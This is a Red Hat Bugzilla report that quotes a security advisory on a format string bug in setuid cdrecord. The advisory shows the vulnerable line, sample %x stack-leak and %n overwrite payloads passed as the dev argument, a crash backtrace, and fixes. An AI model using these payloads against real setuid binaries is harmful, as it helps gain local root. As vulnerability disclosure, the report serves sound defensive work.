Bug 90798 - cdrecord format string vulnerability
cdrecord format string vulnerability
Status: CLOSED UPSTREAM
Product: Red Hat Linux
Classification: Retired
Component: cdrecord (Show other bugs)
7.1
All Linux
medium Severity medium
: ---
: ---
Assigned To: Harald Hoyer
David Lawrence
http://releases.priv8security.org/pri...
:
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2003-05-13 17:47 EDT by Jesse Throwe
Modified: 2007-04-18 12:53 EDT (History)
1 user (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2003-05-14 03:36:27 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Jesse Throwe 2003-05-13 17:47:02 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020929

Description of problem:
----------------------------------------------------------------------------
PACKAGE           : cdrtools
VERSION           : 2.0 
SUMMARY           : Format String
SEVERITY          : local root exploit if suid (on several distros)
DATE:             : 2003-05-05
----------------------------------------------------------------------------


Hi,
i would inform you that there is a format string vulnerability
in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i
suppose:

--------------------------------------------------------------
   271          if (scg__open(scgp, devname) <= 0) {
   272                  if (errs && scgp->errstr)


>>>273                     js_snprintf(errs, slen, scgp->errstr);<<<<

   
   274                  scg_sfree(scgp);
   275                  return ((SCSI *)0);
   276          }
_______________________________________________________
!-------         W A R N I N G      -----------!  
!--- this  is an exploitable vulnerability! ---!
!----------------------------------------------!
Cdrecord is present in several distros as setuid program so this is a real
security hole.

e.g.
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c

Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: File o directory inesistente. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
are root.
as you can see th last %x refers to AAAABBBBCCC so i can use %n for
overwriting. anything i want:
e.g. i can find on the stack the location of the return address...
let's say 0xbffcffcc: 
$./cdrecord dev=`printf 
"\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"`
c/int.c
.....snip....
(core dump)
$ gdb   `which cdrecord`  core -q
....snip...
#0  0x3f in ?? ()
(gdb) bt
#0  0x3f in ?? ()
#1  0x8065451 in scg_open ()
#2  0x8049a3b in main ()
...

so it's exploitable.

Solutions:

A. Updated package can be found on:

	ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

B. Replace line 273 of liscg/scsiopen.c with :
	 js_snprintf(errs, slen, "%s", scgp->errstr);

C. remove the suid bit with:
	chmod 755 `which cdrecord`



Regards,
Stefano Di Paola

------------------

Stefano Di Paola
Software Engineer
stefano.dipaola1<at>tin<dot>it
st0r1e<at>libero<dot>com




Version-Release number of selected component (if applicable):
cdrecord-1.10-4

How reproducible:
Always

Steps to Reproduce:
1. Obtain exploit perl source from URL above.
2. Execute perl script.

    

Actual Results:  The program segfaults (possibly can run a shell instead).

Additional info:

Right now the exploit is geared towards Mandrake, but the offsets can be changed
to run on redhat variants.
Comment 1 Mark J. Cox (Product Security) 2003-05-14 03:26:05 EDT
cdrecord is not distributed setuid on Red Hat Linux 7.1 - removing security
status from this bug.
Comment 2 Jesse Throwe 2003-05-14 10:55:00 EDT
By default this is true, but does not make it a non-issue. 

Looking at the documentation for xcdroast-0.98a9-2 (
/usr/share/doc/xcdroast-0.98a9/README.nonroot )

"Beginning with the alpha7 it was possible to start X-CD-Roast as
normal user. This is only possible by setting a bunch of permissions
correctly - however X-CD-Roast itself does NOT need the suid-root bit,
which is very good for the security-reasons. The suid-root bit is
nevertheless required on cdrecord, cdda2wav, mkisofs and readcd.
All these programs have special handling for this case and drop the
root rights immediately after initialization."

Then it goes on to explain how to set the SUID bit.  So while it is not set by
default, it can and probably will be set by many users wishing to burn cds
without being root.
Comment 3 akopps 2003-05-16 15:25:55 EDT
Cdrecord does not ship setuid by default just like the bind or apache packages
don't setup their init scripts to start by default. However, this doesn't mean
the users might not chose to do it. This is a real security problem IMO.

Note You need to log in before you can comment on or make changes to this bug.